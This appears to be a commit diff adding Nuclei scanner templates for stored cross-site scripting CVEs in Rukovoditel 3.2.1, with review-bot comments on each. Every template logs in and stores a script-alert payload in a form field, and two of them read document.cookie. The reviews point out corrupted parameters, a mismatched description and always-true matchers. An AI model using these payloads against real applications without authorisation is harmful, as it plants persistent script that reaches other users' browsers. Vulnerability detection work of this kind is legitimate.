+++ b/http/cves/2022/CVE-2022-43167.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43167 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/7 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43167 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43167 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2022,rukovoditel,stored,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true 
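Review bot: The saved alert is created with `location=all`, which presumably makes it display to every user of the application until removed; a scan hit therefore leaves an application-wide banner containing the payload, and the description should say so and instruct operators to delete the alert afterwards. Consider also giving the alert a recognisable `description=nuclei-scan` value so it can be found and cleaned up. `verified: "true"` should be the bare boolean used by the neighbouring templates.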
diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml new file mode 100644 index 0000000000..b45ddcd568 --- /dev/null +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-43169 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group". + reference: + - https://github.com/anhdq201/rukovoditel/issues/3 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43169 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43169 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' 
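Review bot: The payload is `alert(document.cookie)` while the other 2022 Rukovoditel templates use `alert(document.domain)`; use `name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E` so the stored marker is uniform and does not read session cookies if it ever executes in a real user's browser. The request creates a Users Access Group that persists on the target, so the description should tell operators to remove it. The `stored` tag and `max-request` metadata present on sibling templates are missing here.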
diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml new file mode 100644 index 0000000000..3e45934dcf --- /dev/null +++ b/http/cves/2022/CVE-2022-43170.yaml 
@@ -0,0 +1,60 @@ +id: CVE-2022-43170 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block". + reference: + - https://github.com/anhdq201/rukovoditel/issues/6 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43170 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43170 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=info_block&is_active=1§ions_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true 
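Review bot: The form body contains `is_active=1§ions_id=0`, where `§` looks like `&sect` of `&sections_id=0` decoded as an HTML entity; if the committed file carries the `§` character the `sections_id` parameter is never sent and the save may be rejected, so verify the line reads `...&is_active=1&sections_id=0&color=default&...`. The same `&not` to `¬` pattern appears in the `notes=` fields of the 2020 templates. The created dashboard info block persists on the target and should be mentioned in the description for cleanup.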
diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml new file mode 100644 index 0000000000..83416143de --- /dev/null +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-43185 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/1 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43185 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43185 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31 + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' 
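Review bot: The description says the flaw is in the Global Lists feature via the Name parameter after clicking "Add", which is a copy of CVE-2022-43164's text, but the request posts to `module=holidays/holidays&action=save` with `start_date`/`end_date`, i.e. the Holidays feature; rewrite the description to match the request and the referenced issue, e.g. `A stored cross-site scripting (XSS) vulnerability in the Holidays feature (/index.php?module=holidays/holidays) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter.`. The hard-coded `start_date=2023-05-22&end_date=2023-05-31` will presumably still be accepted in future, but the created holiday persists and should be noted for cleanup.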
diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml
new file mode 100644
index 0000000000..5802278e39
--- /dev/null
+++ b/http/cves/2022/CVE-2022-44944.yaml
@@ -0,0 +1,61 @@
+id: CVE-2022-44944
+
+info:
+ name: Rukovoditel <= 3.2.1 - Cross Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.
+ reference:
+ - https://github.com/anhdq201/rukovoditel/issues/14
+ - http://rukovoditel.com/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-44944
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2022-44944
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ shodan-query: http.favicon.hash:-1499940355
+ tags: cve,cve2022,rukovoditel,xss,authenticated
+
+http:
+ - raw:
+ - |
+ GET /index.php?module=users/login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /index.php?module=users/login&action=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&username={{username}}&password={{password}}
+
+ - |
+ POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=
+
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(content_type_3, "text/html")'
+ - 'contains(body_3, "")'
+ - 'contains(body_3, "rukovoditel")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: nonce
+ group: 1
+ regex:
+ - 'id="form_session_token" value="(.*)" type="hidden"'
+ internal: true
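Review bot: Key order in the extractor differs from CVE-2022-43185 and -44946 (`internal: true` after `regex:` here, before `group:` there), and `info.name` alternates between "Cross Site Scripting" and "Cross-Site Scripting" across this Rukovoditel set; one ordering and one spelling would make the series easier to review side by side. The nonce regex `value="(.*)"` is greedy and would over-capture if another quoted attribute followed on the same line; `value="([^"]*)"` is the safer form and would work unchanged in every sibling template.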
diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml
new file mode 100644
index 0000000000..0801892bf4
--- /dev/null
+++ b/http/cves/2022/CVE-2022-44946.yaml
@@ -0,0 +1,61 @@
+id: CVE-2022-44946
+
+info:
+ name: Rukovoditel <= 3.2.1 - Cross-Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.
+ reference:
+ - https://github.com/anhdq201/rukovoditel/issues/15
+ - http://rukovoditel.com/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-44946
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2022-44946
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ shodan-query: http.favicon.hash:-1499940355
+ tags: cve,cve2022,rukovoditel,xss,authenticated
+
+http:
+ - raw:
+ - |
+ GET /index.php?module=users/login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /index.php?module=users/login&action=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&username={{username}}&password={{password}}
+
+ - |
+ POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=
+
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(content_type_3, "text/html")'
+ - 'contains(body_3, "")'
+ - 'contains(body_3, "rukovoditel")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: nonce
+ internal: true
+ group: 1
+ regex:
+ - 'id="form_session_token" value="(.*)" type="hidden"'
diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml
new file mode 100644
index 0000000000..897d16e2e4
--- /dev/null
+++ b/http/cves/2022/CVE-2022-44947.yaml
@@ -0,0 +1,61 @@
+id: CVE-2022-44947
+
+info:
+ name: Rukovoditel <= 3.2.1 - Cross Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add".
+ reference:
+ - https://github.com/anhdq201/rukovoditel/issues/13
+ - http://rukovoditel.com/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-44947
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2022-44947
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ shodan-query: http.favicon.hash:-1499940355
+ tags: cve,cve2022,rukovoditel,stored,xss,authenticated
+
+http:
+ - raw:
+ - |
+ GET /index.php?module=users/login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /index.php?module=users/login&action=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&username={{username}}&password={{password}}
+
+ - |
+ POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=¬es=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
+
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(content_type_3, "text/html")'
+ - 'contains(body_3, "")'
+ - 'contains(body_3, "rukovoditel")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: nonce
+ group: 1
+ regex:
+ - 'id="form_session_token" value="(.*)" type="hidden"'
+ internal: true
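Review bot: The form body of the third request contains `¬es=` where the parameter `&notes=` is expected; this looks like the `&not` HTML entity being rendered, but if the committed file really carries the `¬` character, the notes field, which is the injection point named in the description, is never sent and the template cannot do what it claims. The request also hard-codes identifiers from the author's install (`entities_id=24`, `fields_id=193`, `fields_values[]=67`), so on any other instance the save is likely rejected and the template reports a miss rather than the vulnerability; a comment next to the request such as `# entities_id/fields_id are install-specific; obtain per-target values from the listing page` would make that limitation explicit. The `stored` tag is set here and in CVE-2022-44951 but not on the other Rukovoditel stored-XSS templates in this commit.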
diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml
new file mode 100644
index 0000000000..df5122ae57
--- /dev/null
+++ b/http/cves/2022/CVE-2022-44948.yaml
@@ -0,0 +1,59 @@
+id: CVE-2022-44948
+
+info:
+ name: Rukovoditel <= 3.2.1 - Cross-Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add".
+ reference:
+ - https://github.com/anhdq201/rukovoditel/issues/8
+ - http://rukovoditel.com/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-44948
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2022-44948
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2022,rukovoditel,xss,authenticated
+http:
+ - raw:
+ - |
+ GET /index.php?module=users/login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /index.php?module=users/login&action=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&username={{username}}&password={{password}}
+
+ - |
+ POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0
+
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(content_type_3, "text/html")'
+ - 'contains(body_3, "")'
+ - 'contains(body_3, "rukovoditel")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: nonce
+ internal: true
+ group: 1
+ regex:
+ - 'id="form_session_token" value="(.*)" type="hidden"'
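Review bot: The payload here is `alert(document.cookie)` while every sibling Rukovoditel template uses `alert(document.domain)`; nothing in the matcher depends on the difference, and `document.domain` is the convention in this set for a proof of reflection that does not touch session data, so `alert%28document.domain%29` would keep the templates uniform. The description reads `at/index.php` (missing space after "at"), and, like CVE-2022-43185, the file has no blank line between `tags:` and `http:`.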
diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml
new file mode 100644
index 0000000000..2cb5e694f9
--- /dev/null
+++ b/http/cves/2022/CVE-2022-44949.yaml
@@ -0,0 +1,128 @@
+id: CVE-2022-44949
+
+info:
+ name: Rukovoditel <= 3.2.1 - Cross Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field.
+ reference:
+ - https://github.com/anhdq201/rukovoditel/issues/12
+ - http://rukovoditel.com/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-44949
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2022-44949
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2022,rukovoditel,xss,authenticated
+
+http:
+ - raw:
+ - |
+ GET /index.php?module=users/login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /index.php?module=users/login&action=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&username={{username}}&password={{password}}
+
+ - |
+ POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="form_session_token"
+
+ {{nonce}}
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="entities_id"
+
+ 24
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="forms_tabs_id"
+
+ 29
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="name"
+
+ test
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="short_name"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="type"
+
+ fieldtype_input
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="fields_configuration[width]"
+
+ input-small
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="fields_configuration[default_value]"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="fields_configuration[is_unique]"
+
+ 0
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="fields_configuration[unique_error_msg]"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="required_message"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="tooltip"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="tooltip_item_page"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="access_template"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="access[5]"
+
+ yes
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="access[4]"
+
+ yes
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="notes"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf--
+
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 3
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(content_type_3, "text/html")'
+ - 'contains(body_3, "")'
+ - 'contains(body_3, "rukovoditel")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: nonce
+ group: 1
+ regex:
+ - 'id="form_session_token" value="(.*)" type="hidden"'
+ internal: true
diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml
new file mode 100644
index 0000000000..b0857fad91
--- /dev/null
+++ b/http/cves/2022/CVE-2022-44950.yaml
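Review bot: The `short_name` part of the multipart body is empty as rendered, yet the description names Short Name as the injection point; if the payload was stripped in rendering, confirm the committed file carries it, otherwise the third request stores a blank field and the matcher can only pass through the always-true `contains(body_3, "")`. The request also hard-codes `entities_id=24` and `forms_tabs_id=29`, ids from the author's install, and if the save succeeds it leaves a new custom field on the target with no cleanup step, which is worth saying in the description (e.g. `This template creates a persistent custom field on the target entity.`). `max-redirects: 3` differs from the `2` used by the other Rukovoditel templates without any visible reason. CVE-2022-44950 is the same request with the payload moved to `name` and shares all of these points.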
@@ -0,0 +1,128 @@
+id: CVE-2022-44950
+
+info:
+ name: Rukovoditel <= 3.2.1 - Cross Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
+ reference:
+ - https://github.com/anhdq201/rukovoditel/issues/10
+ - http://rukovoditel.com/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-44950
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2022-44950
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2022,rukovoditel,xss,authenticated
+
+http:
+ - raw:
+ - |
+ GET /index.php?module=users/login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /index.php?module=users/login&action=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&username={{username}}&password={{password}}
+
+ - |
+ POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="form_session_token"
+
+ {{nonce}}
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="entities_id"
+
+ 24
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="forms_tabs_id"
+
+ 29
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="name"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="short_name"
+
+ test
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="type"
+
+ fieldtype_input
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="fields_configuration[width]"
+
+ input-small
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="fields_configuration[default_value]"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="fields_configuration[is_unique]"
+
+ 0
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="fields_configuration[unique_error_msg]"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="required_message"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="tooltip"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="tooltip_item_page"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="access_template"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="access[5]"
+
+ yes
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="access[4]"
+
+ yes
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf
+ Content-Disposition: form-data; name="notes"
+
+
+ ------WebKitFormBoundaryfKx13B5QBU5Sccgf--
+
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 3
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(content_type_3, "text/html")'
+ - 'contains(body_3, "")'
+ - 'contains(body_3, "rukovoditel")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: nonce
+ group: 1
+ regex:
+ - 'id="form_session_token" value="(.*)" type="hidden"'
+ internal: true
diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml
new file mode 100644
index 0000000000..b88e86034d
--- /dev/null
+++ b/http/cves/2022/CVE-2022-44951.yaml
@@ -0,0 +1,59 @@
+id: CVE-2022-44951
+
+info:
+ name: Rukovoditel <= 3.2.1 - Cross Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
+ reference:
+ - https://github.com/anhdq201/rukovoditel/issues/11
+ - http://rukovoditel.com/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-44951
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 5.4
+ cve-id: CVE-2022-44951
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2022,rukovoditel,stored,xss,authenticated
+
+http:
+ - raw:
+ - |
+ GET /index.php?module=users/login HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /index.php?module=users/login&action=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&username={{username}}&password={{password}}
+
+ - |
+ POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ form_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=
+
+ cookie-reuse: true
+ redirects: true
+ matchers:
